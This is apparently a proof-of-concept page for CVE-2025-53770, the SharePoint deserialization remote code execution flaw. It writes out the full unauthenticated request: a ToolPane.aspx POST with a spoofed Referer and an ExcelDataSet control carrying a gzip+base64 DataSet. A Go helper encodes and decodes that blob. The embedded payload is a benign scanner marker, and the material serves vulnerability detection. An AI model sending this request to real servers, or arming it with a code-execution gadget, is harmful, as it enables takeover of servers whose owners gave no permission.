PoC details: d619956fc9ad30a8a7a67c306520767c8a63a717

Source
Related vulnerability
Title: Microsoft SharePoint Server security vulnerability (CVE-2025-53770)
Description: Microsoft SharePoint Server is a collaboration platform from Microsoft Corporation (United States). Microsoft SharePoint Server contains a security vulnerability that stems from deserialization of untrusted data and may lead to remote code execution.
Description
Unauthenticated Remote Code Execution via unsafe deserialization in Microsoft SharePoint Server (CVE-2025-53770)
Introduction
# CVE-2025-53770 SharePoint Deserialization RCE PoC

> **Critical** — Unauthenticated Remote Code Execution via unsafe deserialization in Microsoft SharePoint Server (CVE-2025-53770)

## Description

Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthenticated attacker to execute code over the network and take over the server. Microsoft reported active exploitation at the time this advisory was published; apply the updates and mitigations from the Microsoft guidance linked below before relying on any check.

- **Impact**: Unauthenticated attackers can achieve remote code execution, leading to full system compromise.
- **Severity**: Critical

## Proof of Concept

The following check sends the request shape through which the vulnerable endpoint is reached: a POST to the ToolPane.aspx edit page with a `Referer` of `/_layouts/SignOut.aspx`, whose `MSOTlPn_DWP` body registers an `ExcelDataSet` control carrying a `CompressedDataTable` attribute. That attribute is a gzip-compressed, base64-encoded DataSet; here it holds the benign test payload from the referenced `test_payload.go`, not a code-execution gadget. The pipeline extracts the `CompressedDataTable` value the server reflects in its response, base64- and gzip-decodes it, keeps a copy in `/tmp/sharepoint_decoded_payload.txt`, and greps for the marker. A hit shows that the endpoint echoed the control markup back; it does not by itself prove code execution on the target.

**Target domain is intentionally replaced with `reeaccated.com`.**

### Command

```bash
# Step 1: POST the ToolPane edit page with the Referer header the request
# depends on, sending the MSOTlPn_DWP body that registers an ExcelDataSet
# control whose CompressedDataTable is the gzip+base64 test DataSet.
# Step 2: pull the CompressedDataTable value the response reflects
# (HTML-encoded quotes, hence &quot;), base64-decode, gunzip, keep a copy,
# and grep for the marker. Needs GNU grep for -P; decode errors are silenced.
curl -sk -X POST 'https://reeaccated.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx' \
  -H 'Referer: /_layouts/SignOut.aspx' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'MSOTlPn_Uri=https://reeaccated.com' \
  --data-urlencode 'MSOTlPn_DWP=
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
  <ProgressTemplate>
    <div class="divWaiting">
      <Scorecard:ExcelDataSet CompressedDataTable="H4sIAADEfmgA/4WRX2uzMBTG7/0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9+PEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c+c1Umalp33/0/62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl+ftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S/VeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1+t/pbj+vyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA=" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
    </div>
  </ProgressTemplate>
</asp:UpdateProgress>' \
| grep -oP 'CompressedDataTable=&quot;\K[^&]+(?=&quot;)' \
| base64 -d 2>/dev/null \
| gzip -d 2>/dev/null \
| tee /tmp/sharepoint_decoded_payload.txt \
| grep -Ei 'IntruderScannerDetectionPayload|ExcelDataSet|divWaiting|ProgressTemplate|Scorecard'
```

### Output

```
<Info>IntruderScannerDetectionPayload</Info>
```
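The shell pipeline above hides two things a practitioner wants to see explicitly: how the `CompressedDataTable` value is built (gzip, then base64) and what the decision at the end actually is. The following Go program is an added example written for this page; it is not code from the original repository or from the referenced `test_payload.go`. It encodes a constructed test DataSet the same way, extracts the attribute from a response body whether the quotes arrive raw or as `&quot;` (the page's grep handles only the latter), and decodes with a size cap so a hostile response cannot feed the checker a decompression bomb. The response fragment in `ConstructedResponse` is constructed inline, not captured from a real server; the marker string is the one the page's output shows.

```go
package main

import (
	"bytes"
	"compress/gzip"
	"encoding/base64"
	"errors"
	"fmt"
	"io"
	"regexp"
	"strings"
)

// Marker is the string the page's test DataSet carries; the pipeline greps for it.
const Marker = "IntruderScannerDetectionPayload"

// EncodeDataTable builds a CompressedDataTable value: gzip the DataSet XML,
// then base64-encode the compressed bytes.
func EncodeDataTable(xml string) (string, error) {
	var buf bytes.Buffer
	zw := gzip.NewWriter(&buf)
	if _, err := zw.Write([]byte(xml)); err != nil {
		return "", err
	}
	if err := zw.Close(); err != nil {
		return "", err
	}
	return base64.StdEncoding.EncodeToString(buf.Bytes()), nil
}

// DecodeDataTable reverses EncodeDataTable. Output is capped at 1 MiB so an
// attacker-controlled response cannot turn the checker into a gzip-bomb victim
// (the shell pipeline has no such limit). Errors tell bad base64 from non-gzip.
func DecodeDataTable(b64 string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(strings.TrimSpace(b64))
	if err != nil {
		return "", fmt.Errorf("base64: %w", err)
	}
	zr, err := gzip.NewReader(bytes.NewReader(raw))
	if err != nil {
		return "", fmt.Errorf("gzip header: %w", err)
	}
	defer zr.Close()
	out, err := io.ReadAll(io.LimitReader(zr, 1<<20))
	if err != nil {
		return "", fmt.Errorf("gzip body: %w", err)
	}
	return string(out), nil
}

// attrRe accepts raw quotes or HTML-encoded &quot; around the base64 value.
var attrRe = regexp.MustCompile(`CompressedDataTable=(?:&quot;|")([A-Za-z0-9+/=]+)(?:&quot;|")`)

// ExtractCompressedDataTable returns the first CompressedDataTable value in body.
func ExtractCompressedDataTable(body string) (string, bool) {
	m := attrRe.FindStringSubmatch(body)
	if m == nil {
		return "", false
	}
	return m[1], true
}

// CheckResponse is the pipeline's decision in one place: true only when the
// response reflects a CompressedDataTable that decodes to XML containing the
// marker element. It cannot tell you whether anything ran on the server.
func CheckResponse(body string) (bool, error) {
	b64, ok := ExtractCompressedDataTable(body)
	if !ok {
		return false, errors.New("no CompressedDataTable attribute in response")
	}
	xml, err := DecodeDataTable(b64)
	if err != nil {
		return false, err
	}
	return strings.Contains(xml, "<Info>"+Marker+"</Info>"), nil
}

// ConstructedResponse fakes the relevant fragment of a response (constructed
// for this example, not captured from SharePoint): the DWP markup echoed back
// inside an HTML attribute, so its quotes appear as &quot;.
func ConstructedResponse(xml string) (string, error) {
	b64, err := EncodeDataTable(xml)
	if err != nil {
		return "", err
	}
	return `<input type="hidden" name="MSOTlPn_DWP" value="&lt;Scorecard:ExcelDataSet CompressedDataTable=&quot;` +
		b64 + `&quot; runat=&quot;server&quot;&gt;" />`, nil
}

func main() {
	xml := "<DataSet><Info>" + Marker + "</Info></DataSet>" // constructed test DataSet
	body, err := ConstructedResponse(xml)
	if err != nil {
		panic(err)
	}
	hit, err := CheckResponse(body)
	fmt.Println("marker reflected:", hit, "err:", err)
}
```

To inspect a real response, pass its body to `CheckResponse`; to look at the page's own blob, pass the `CompressedDataTable` string to `DecodeDataTable`. Keep the size cap when pointing this at untrusted servers.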

<img width="3024" height="1964" alt="image" src="https://github.com/user-attachments/assets/fcbc84e9-ffc0-4264-bde8-f2a4b4b70095" />



## References

- [Test Payload Implementation](https://github.com/hazcod/CVE-2025-53770/blob/main/pkg/payload/test_payload.go)
- [Code White Security Analysis](https://x.com/codewhitesec/status/1944743478350557232)
- [Microsoft Guidance](https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/)
- [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2025-53770)

---


**Impact:**  
Unauthenticated attackers can exploit unsafe deserialization to achieve remote code execution on SharePoint Server, leading to full system compromise.
File snapshot

[4.0K] /data/pocs/d619956fc9ad30a8a7a67c306520767c8a63a717
└── [3.2K] README.md

0 directories, 1 file